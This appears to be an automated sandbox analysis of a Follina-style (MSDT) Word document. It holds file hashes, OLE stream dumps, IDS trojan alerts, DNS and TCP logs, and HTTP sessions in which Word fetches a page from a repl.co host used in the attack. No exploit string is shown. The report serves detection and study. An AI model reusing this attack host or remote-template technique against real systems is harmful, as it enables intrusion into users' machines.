            SHA512:4b3fee7cddc41a3f742d2ca3bcc6db766e43d183b926153927ec5591d73cce2d0cf5b4ade9d0f010bf6b104f463d44e383e423984d0bf5684e58971dd0665ee7
            SSDEEP:384:aW5NndAzG46H8kwV1xEw2imBTQUhGnhHpAKIQqRrINxt/ZtNNiW2+30Ony/6MY:awlO1Ew2HGHiKpqRrSxllN2+3By/e
            TLSH:DCC2C057D12B5C75CC6A4EBCD82C8ABCEA9430D0F9151187244DE6C9B24BD73133EA1A
            File Content Preview:PK..........!..l.$u...........[Content_Types].xml ...(.........................................................................................................................................................................................................
            Icon Hash:e4e6a2a2a4b4b4a4
            Document Type:OpenXML
            Number of OLE Files:1
            Has Summary Info:
            Application Name:
            Encrypted Document:False
            Contains Word Document Stream:True
            Contains Workbook/Book Stream:False
            Contains PowerPoint Document Stream:False
            Contains Visio Document Stream:False
            Contains ObjectPool Stream:False
            Flash Objects Count:0
            Contains VBA Macros:False
            Title:
            Subject:
            Author:Karewen .
            Keywords:
            Template:Normal.dotm
            Last Saved By:Karewen .
            Revion Number:2
            Total Edit Time:0
            Create Time:2022-06-03T10:03:00Z
            Last Saved Time:2022-06-03T10:03:00Z
            Number of Pages:1
            Number of Words:3
            Number of Characters:18
            Creating Application:Microsoft Office Word
            Security:0
            Number of Lines:1
            Number of Paragraphs:1
            Thumbnail Scaling Desired:false
            Company:
            Contains Dirty Links:false
            Shared Document:false
            Changed Hyperlinks:false
            Application Version:16.0000
            General
            Stream Path:\x1CompObj
            File Type:data
            Stream Size:76
            Entropy:3.093449526469053
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 0c 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 0c 00 00 00 4f 4c 45 20 50 61 63 6b 61 67 65 00 00 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:\x1Ole10Native
            File Type:data
            Stream Size:2240124
            Entropy:0.005070123031127669
            Base64 Encoded:True
            Data ASCII:x . " . . . N e w B i t m a p i m a g e . b m p . D : \\ S a y a a r \\ P e r s o n a l \\ C o d i n g \\ M S D T Z e r o - D a y \\ M S F o l l i n a \\ N e w B i t m a p i m a g e . b m p . . . . . ^ . . . C : \\ U s e r s \\ k a r e w \\ A p p D a t a \\ L o c a l \\ T e m p \\ { 4 9 2 A 0 5 A 6 - 0 F C E - 4 3 E 2 - A F E 7 - D D 9 A E A 8 4 F C 1 B } \\ N e w B i t m a p i m a g e . b m p . 6 , " . B M 6 , " . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . , " . . . . . . . . . . . . . . . . .
            Data Raw:78 2e 22 00 02 00 4e 65 77 20 42 69 74 6d 61 70 20 69 6d 61 67 65 2e 62 6d 70 00 44 3a 5c 53 61 79 61 61 72 5c 50 65 72 73 6f 6e 61 6c 5c 43 6f 64 69 6e 67 5c 4d 53 44 54 20 5a 65 72 6f 2d 44 61 79 5c 4d 53 46 6f 6c 6c 69 6e 61 5c 4e 65 77 20 42 69 74 6d 61 70 20 69 6d 61 67 65 2e 62 6d 70 00 00 00 03 00 5e 00 00 00 43 3a 5c 55 73 65 72 73 5c 6b 61 72 65 77 5c 41 70 70 44 61 74 61
            General
            Stream Path:\x3EPRINT
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Stream Size:10172
            Entropy:3.928478624213631
            Base64 Encoded:False
            Data ASCII:. . . . l . . . . . . . . . . . . . . I . . . . . . . . . . . ' . . . 9 . . . E M F . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . . R . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . e . g . o . e . . U . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:01 00 00 00 6c 00 00 00 18 00 00 00 00 00 00 00 d7 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 27 0f 00 00 39 05 00 00 20 45 4d 46 00 00 01 00 bc 27 00 00 0d 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 00 38 04 00 00 35 01 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 b7 04 00 b0 a7 02 00 0a 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00
            General
            Stream Path:\x3ObjInfo
            File Type:data
            Stream Size:6
            Entropy:1.2516291673878228
            Base64 Encoded:False
            Data ASCII:. . . . . .
            Data Raw:00 00 03 00 0d 00
            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
            35.186.245.55192.168.2.22443491762025010 08/18/22-04:23:24.931708TCP2025010ET TROJAN Powershell commands sent B64 14434917635.186.245.55192.168.2.22
            35.186.245.55192.168.2.22443491812025010 08/18/22-04:23:28.806682TCP2025010ET TROJAN Powershell commands sent B64 14434918135.186.245.55192.168.2.22
            TimestampSource PortDest PortSource IPDest IP
            Aug 18, 2022 04:23:06.193463087 CEST49173443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:06.193548918 CEST4434917335.186.245.55192.168.2.22
            Aug 18, 2022 04:23:06.193672895 CEST49173443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:06.207406998 CEST49173443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:06.207438946 CEST4434917335.186.245.55192.168.2.22
            Aug 18, 2022 04:23:06.380359888 CEST4434917335.186.245.55192.168.2.22
            Aug 18, 2022 04:23:06.380518913 CEST49173443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:06.391787052 CEST49173443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:06.391815901 CEST4434917335.186.245.55192.168.2.22
            Aug 18, 2022 04:23:06.392262936 CEST4434917335.186.245.55192.168.2.22
            Aug 18, 2022 04:23:06.392323017 CEST49173443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:06.842437029 CEST49173443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:06.883389950 CEST4434917335.186.245.55192.168.2.22
            Aug 18, 2022 04:23:07.087683916 CEST4434917335.186.245.55192.168.2.22
            Aug 18, 2022 04:23:07.087789059 CEST4434917335.186.245.55192.168.2.22
            Aug 18, 2022 04:23:07.087824106 CEST49173443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:07.090807915 CEST49173443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:07.103862047 CEST49173443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:07.103905916 CEST4434917335.186.245.55192.168.2.22
            Aug 18, 2022 04:23:07.103915930 CEST49173443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:07.103952885 CEST49173443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:19.050564051 CEST49174443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:19.050672054 CEST4434917434.149.204.188192.168.2.22
            Aug 18, 2022 04:23:19.050815105 CEST49174443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:19.051099062 CEST49174443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:19.051130056 CEST4434917434.149.204.188192.168.2.22
            Aug 18, 2022 04:23:19.212224960 CEST4434917434.149.204.188192.168.2.22
            Aug 18, 2022 04:23:19.212358952 CEST49174443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:19.222294092 CEST49174443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:19.222328901 CEST4434917434.149.204.188192.168.2.22
            Aug 18, 2022 04:23:19.222820044 CEST4434917434.149.204.188192.168.2.22
            Aug 18, 2022 04:23:19.245089054 CEST49174443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:19.291367054 CEST4434917434.149.204.188192.168.2.22
            Aug 18, 2022 04:23:19.499521971 CEST4434917434.149.204.188192.168.2.22
            Aug 18, 2022 04:23:19.499900103 CEST49174443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:19.499938011 CEST4434917434.149.204.188192.168.2.22
            Aug 18, 2022 04:23:19.499965906 CEST49174443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:19.499972105 CEST4434917434.149.204.188192.168.2.22
            Aug 18, 2022 04:23:19.500001907 CEST4434917434.149.204.188192.168.2.22
            Aug 18, 2022 04:23:23.998555899 CEST49175443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:23.998600960 CEST4434917534.149.204.188192.168.2.22
            Aug 18, 2022 04:23:23.998675108 CEST49175443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:23.999838114 CEST49175443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:23.999859095 CEST4434917534.149.204.188192.168.2.22
            Aug 18, 2022 04:23:24.163655043 CEST4434917534.149.204.188192.168.2.22
            Aug 18, 2022 04:23:24.163757086 CEST49175443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:24.169996977 CEST49175443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:24.170021057 CEST4434917534.149.204.188192.168.2.22
            Aug 18, 2022 04:23:24.170578957 CEST4434917534.149.204.188192.168.2.22
            Aug 18, 2022 04:23:24.209079981 CEST49175443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:24.255384922 CEST4434917534.149.204.188192.168.2.22
            Aug 18, 2022 04:23:24.468491077 CEST4434917534.149.204.188192.168.2.22
            Aug 18, 2022 04:23:24.468570948 CEST4434917534.149.204.188192.168.2.22
            Aug 18, 2022 04:23:24.468777895 CEST49175443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:24.469403028 CEST49175443192.168.2.2234.149.204.188
            Aug 18, 2022 04:23:24.469420910 CEST4434917534.149.204.188192.168.2.22
            Aug 18, 2022 04:23:24.496511936 CEST49176443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:24.496556044 CEST4434917635.186.245.55192.168.2.22
            Aug 18, 2022 04:23:24.496635914 CEST49176443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:24.496906042 CEST49176443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:24.496921062 CEST4434917635.186.245.55192.168.2.22
            Aug 18, 2022 04:23:24.656685114 CEST4434917635.186.245.55192.168.2.22
            Aug 18, 2022 04:23:24.656788111 CEST49176443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:24.664288998 CEST49176443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:24.664318085 CEST4434917635.186.245.55192.168.2.22
            Aug 18, 2022 04:23:24.667854071 CEST49176443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:24.667876959 CEST4434917635.186.245.55192.168.2.22
            Aug 18, 2022 04:23:24.921617985 CEST4434917635.186.245.55192.168.2.22
            Aug 18, 2022 04:23:24.921694994 CEST4434917635.186.245.55192.168.2.22
            Aug 18, 2022 04:23:24.921843052 CEST49176443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:24.921859026 CEST4434917635.186.245.55192.168.2.22
            Aug 18, 2022 04:23:24.921871901 CEST49176443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:24.921907902 CEST49176443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:24.931603909 CEST4434917635.186.245.55192.168.2.22
            Aug 18, 2022 04:23:24.931698084 CEST4434917635.186.245.55192.168.2.22
            Aug 18, 2022 04:23:24.931782007 CEST4434917635.186.245.55192.168.2.22
            Aug 18, 2022 04:23:24.931821108 CEST49176443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:24.931837082 CEST49176443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:24.932337999 CEST49176443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:24.932358980 CEST4434917635.186.245.55192.168.2.22
            Aug 18, 2022 04:23:26.210772991 CEST49177443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:26.210839987 CEST4434917735.186.245.55192.168.2.22
            Aug 18, 2022 04:23:26.210918903 CEST49177443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:26.211433887 CEST49177443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:26.211458921 CEST4434917735.186.245.55192.168.2.22
            Aug 18, 2022 04:23:26.373008013 CEST4434917735.186.245.55192.168.2.22
            Aug 18, 2022 04:23:26.373100042 CEST49177443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:26.381207943 CEST49177443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:26.381238937 CEST4434917735.186.245.55192.168.2.22
            Aug 18, 2022 04:23:26.384861946 CEST49177443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:26.384892941 CEST4434917735.186.245.55192.168.2.22
            Aug 18, 2022 04:23:26.612524986 CEST4434917735.186.245.55192.168.2.22
            Aug 18, 2022 04:23:26.612626076 CEST4434917735.186.245.55192.168.2.22
            Aug 18, 2022 04:23:26.612701893 CEST49177443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:26.612737894 CEST49177443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:26.614072084 CEST49177443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:26.614108086 CEST4434917735.186.245.55192.168.2.22
            Aug 18, 2022 04:23:26.614263058 CEST49177443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:26.614304066 CEST49177443192.168.2.2235.186.245.55
            Aug 18, 2022 04:23:26.858321905 CEST49178443192.168.2.2235.186.245.55
            TimestampSource PortDest PortSource IPDest IP
            Aug 18, 2022 04:23:06.071744919 CEST5586853192.168.2.228.8.8.8
            Aug 18, 2022 04:23:06.182066917 CEST53558688.8.8.8192.168.2.22
            Aug 18, 2022 04:23:18.824484110 CEST4968853192.168.2.228.8.8.8
            Aug 18, 2022 04:23:18.931935072 CEST53496888.8.8.8192.168.2.22
            Aug 18, 2022 04:23:18.939836979 CEST5883653192.168.2.228.8.8.8
            Aug 18, 2022 04:23:19.049377918 CEST53588368.8.8.8192.168.2.22
            Aug 18, 2022 04:23:23.852726936 CEST5013453192.168.2.228.8.8.8
            Aug 18, 2022 04:23:23.871582985 CEST53501348.8.8.8192.168.2.22
            Aug 18, 2022 04:23:23.885284901 CEST5527553192.168.2.228.8.8.8
            Aug 18, 2022 04:23:23.994752884 CEST53552758.8.8.8192.168.2.22
            Aug 18, 2022 04:23:27.740761995 CEST5991553192.168.2.228.8.8.8
            Aug 18, 2022 04:23:27.850553036 CEST53599158.8.8.8192.168.2.22
            Aug 18, 2022 04:23:27.853646040 CEST5440853192.168.2.228.8.8.8
            Aug 18, 2022 04:23:27.959486961 CEST53544088.8.8.8192.168.2.22
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Aug 18, 2022 04:23:06.071744919 CEST192.168.2.228.8.8.80xeea0Standard query (0)dullghostwhitetwintext.karewen.repl.coA (IP address)IN (0x0001)
            Aug 18, 2022 04:23:18.824484110 CEST192.168.2.228.8.8.80x5748Standard query (0)dullghostwhitetwintext.karewen.repl.coA (IP address)IN (0x0001)
            Aug 18, 2022 04:23:18.939836979 CEST192.168.2.228.8.8.80x5deaStandard query (0)dullghostwhitetwintext.karewen.repl.coA (IP address)IN (0x0001)
            Aug 18, 2022 04:23:23.852726936 CEST192.168.2.228.8.8.80xdc64Standard query (0)dullghostwhitetwintext.karewen.repl.coA (IP address)IN (0x0001)
            Aug 18, 2022 04:23:23.885284901 CEST192.168.2.228.8.8.80xbe50Standard query (0)dullghostwhitetwintext.karewen.repl.coA (IP address)IN (0x0001)
            Aug 18, 2022 04:23:27.740761995 CEST192.168.2.228.8.8.80x10d3Standard query (0)dullghostwhitetwintext.karewen.repl.coA (IP address)IN (0x0001)
            Aug 18, 2022 04:23:27.853646040 CEST192.168.2.228.8.8.80x722dStandard query (0)dullghostwhitetwintext.karewen.repl.coA (IP address)IN (0x0001)
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Aug 18, 2022 04:23:06.182066917 CEST8.8.8.8192.168.2.220xeea0No error (0)dullghostwhitetwintext.karewen.repl.co35.186.245.55A (IP address)IN (0x0001)
            Aug 18, 2022 04:23:18.931935072 CEST8.8.8.8192.168.2.220x5748No error (0)dullghostwhitetwintext.karewen.repl.co34.149.204.188A (IP address)IN (0x0001)
            Aug 18, 2022 04:23:19.049377918 CEST8.8.8.8192.168.2.220x5deaNo error (0)dullghostwhitetwintext.karewen.repl.co34.149.204.188A (IP address)IN (0x0001)
            Aug 18, 2022 04:23:23.871582985 CEST8.8.8.8192.168.2.220xdc64No error (0)dullghostwhitetwintext.karewen.repl.co34.149.204.188A (IP address)IN (0x0001)
            Aug 18, 2022 04:23:23.994752884 CEST8.8.8.8192.168.2.220xbe50No error (0)dullghostwhitetwintext.karewen.repl.co34.149.204.188A (IP address)IN (0x0001)
            Aug 18, 2022 04:23:27.850553036 CEST8.8.8.8192.168.2.220x10d3No error (0)dullghostwhitetwintext.karewen.repl.co34.149.204.188A (IP address)IN (0x0001)
            Aug 18, 2022 04:23:27.959486961 CEST8.8.8.8192.168.2.220x722dNo error (0)dullghostwhitetwintext.karewen.repl.co35.186.245.55A (IP address)IN (0x0001)
            • dullghostwhitetwintext.karewen.repl.co
            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.224917335.186.245.55443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            2022-08-18 02:23:06 UTC0OUTOPTIONS / HTTP/1.1
            User-Agent: Microsoft Office Protocol Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            Content-Length: 0
            Connection: Keep-Alive
            2022-08-18 02:23:07 UTC0INHTTP/1.1 404 Not Found
            Content-Length: 207
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:07 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758095; includeSubDomains
            Connection: close
            2022-08-18 02:23:07 UTC0INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


            Session IDSource IPSource PortDestination IPDestination PortProcess
            1192.168.2.224917434.149.204.188443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            2022-08-18 02:23:19 UTC0OUTHEAD /index.html HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft Office Existence Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            2022-08-18 02:23:19 UTC0INHTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:19 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758082; includeSubDomains
            Connection: close


            Session IDSource IPSource PortDestination IPDestination PortProcess
            10192.168.2.224918335.186.245.55443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            2022-08-18 02:23:29 UTC17OUTHEAD /index.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            Content-Length: 0
            Connection: Keep-Alive
            2022-08-18 02:23:29 UTC18INHTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:29 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758072; includeSubDomains
            Connection: close


            Session IDSource IPSource PortDestination IPDestination PortProcess
            2192.168.2.224917534.149.204.188443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            2022-08-18 02:23:24 UTC1OUTOPTIONS / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
            translate: f
            Host: dullghostwhitetwintext.karewen.repl.co
            2022-08-18 02:23:24 UTC1INHTTP/1.1 404 Not Found
            Content-Length: 207
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:24 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758077; includeSubDomains
            Connection: close
            2022-08-18 02:23:24 UTC1INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


            Session IDSource IPSource PortDestination IPDestination PortProcess
            3192.168.2.224917635.186.245.55443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            2022-08-18 02:23:24 UTC2OUTGET /index.html HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            Host: dullghostwhitetwintext.karewen.repl.co
            Connection: Keep-Alive
            2022-08-18 02:23:24 UTC2INHTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:24 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758077; includeSubDomains
            Connection: close
            2022-08-18 02:23:24 UTC2INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0a 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 3e 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74 20 69 64 20 6d 61 67 6e 61
            Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna
            2022-08-18 02:23:24 UTC3INData Raw: 2c 20 73 65 6d 70 65 72 20 74 75 72 70 69 73 20 75 74 2c 20 67 72 61 76 69 64 61 20 6c 6f 72 65 6d 2e 20 50 72 6f 69 6e 20 61 72 63 75 20 6c 69 67 75 6c 61 2c 20 76 65 6e 65 6e 61 74 69 73 20 61 6c 69 71 75 61 6d 20 74 72 69 73 74 69 71 75 65 20 75 74 2c 20 70 72 65 74 69 75 6d 20 71 75 69 73 20 76 65 6c 69 74 2e 0a 0a 50 68 61 73 65 6c 6c 75 73 20 74 72 69 73 74 69 71 75 65 20 6f 72 63 69 20 65 6e 69 6d 2c 20 61 74 20 61 63 63 75 6d 73 61 6e 20 76 65 6c 69 74 20 69 6e 74 65 72 64 75 6d 20 65 74 2e 20 41 65 6e 65 61 6e 20 6e 65 63 20 74 72 69 73 74 69 71 75 65 20 61 6e 74 65 2c 20 64 69 67 6e 69 73 73 69 6d 20 63 6f 6e 76 61 6c 6c 69 73 20 6c 69 67 75 6c 61 2e 20 41 65 6e 65 61 6e 20 71 75 69 73 20 66 65 6c 69 73 20 64 6f 6c 6f 72 2e 20 49 6e 20 71 75 69
            Data Ascii: , semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In qui
            2022-08-18 02:23:24 UTC5INData Raw: 73 2c 20 74 75 72 70 69 73 20 64 6f 6c 6f 72 20 65 6c 65 69 66 65 6e 64 20 6d 61 73 73 61 2c 20 69 6e 20 6d 61 78 69 6d 75 73 20 73 61 70 69 65 6e 20 64 75 69 20 65 74 20 74 6f 72 74 6f 72 2e 20 51 75 69 73 71 75 65 20 76 61 72 69 75 73 20 65 6e 69 6d 20 73 65 64 20 65 6e 69 6d 20 76 65 6e 65 6e 61 74 69 73 20 74 65 6d 70 6f 72 2e 20 50 72 61 65 73 65 6e 74 20 71 75 69 73 20 76 6f 6c 75 74 70 61 74 20 6c 6f 72 65 6d 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 61 63 20 76 65 6e 65 6e 61 74 69 73 20 6c 61 63 75 73 2c 20 76 69 74 61 65 20 63 6f 6d 6d 6f 64 6f 20 6f 64 69 6f 2e 20 53 65 64 20 69 6e 20 6d 65 74 75 73 20 61 74 20 6c 69 62 65 72 6f 20 76 69 76 65 72 72 61 20 6d 6f 6c 6c 69 73 20 73 65 64 20 76 69 74 61 65 20 6e 69 62 68 2e 20 53 65 64 20 61 74
            Data Ascii: s, turpis dolor eleifend massa, in maximus sapien dui et tortor. Quisque varius enim sed enim venenatis tempor. Praesent quis volutpat lorem. Pellentesque ac venenatis lacus, vitae commodo odio. Sed in metus at libero viverra mollis sed vitae nibh. Sed at
            2022-08-18 02:23:24 UTC6INData Raw: 20 71 75 69 73 20 65 6c 65 69 66 65 6e 64 20 6e 65 63 2c 20 73 75 73 63 69 70 69 74 20 73 69 74 20 61 6d 65 74 20 6d 61 73 73 61 2e 20 56 69 76 61 6d 75 73 20 69 6e 20 6c 65 63 74 75 73 20 65 72 61 74 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 56 69 76 61 6d 75 73 20 73 65 64 20 6d 61 73 73 61 20 71 75 69 73 20 61 72 63 75 20 65 67 65 73 74 61 73 20 76 65 68 69 63 75 6c 61 2e 20 4e 75 6c 6c 61 20 6d 61 73 73 61 20 6c 6f 72 65 6d 2c 20 74 69 6e 63 69 64 75 6e 74 20 73 65 64 20 66 65 75 67 69 61 74 20 71 75 69 73 2c 20 66 61 75 63 69 62 75 73 20 61 20 72 69 73 75 73 2e 20 53 65 64 20 76 69 76 65 72 72 61 20 74 75 72 70 69 73 20 73 69 74 20 61 6d 65 74 20 6d 65 74 75 73 20 69 61 63 75 6c 69 73 20 66 69 6e 69 62 75 73 2e 0a 0a 4d 6f 72 62 69 20 63
